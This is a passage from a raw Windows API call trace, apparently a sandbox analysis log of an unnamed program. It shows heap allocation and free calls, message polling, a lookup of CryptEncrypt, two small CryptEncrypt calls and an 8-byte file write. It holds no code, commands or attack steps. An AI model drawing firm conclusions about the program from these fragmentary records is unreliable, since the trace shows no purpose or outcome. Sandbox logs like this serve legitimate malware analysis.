lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0156.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0156.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0156.502] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0156.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0156.502] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0156.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0156.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0156.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0156.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0156.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0156.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0156.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0156.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0156.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0156.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0156.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0156.506] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0156.506] CryptEncrypt (in: hKey=0x9e2178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.506] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.506] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.506] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.506] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0156.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0156.507] CryptEncrypt (in: hKey=0x9e2178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71a68*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71a68*, pdwDataLen=0x8cef60*=0x8) returned 1 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.507] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0156.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.507] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0156.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.507] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0156.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.508] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0156.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.508] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.508] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.508] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.508] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.508] WriteFile (in: hFile=0x470, lpBuffer=0x2a717c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a717c8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0156.509] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.509] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.509] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0156.509] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.509] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0156.509] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.509] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.509] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.509] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0156.509] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.509] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0156.510] PeekMessageW 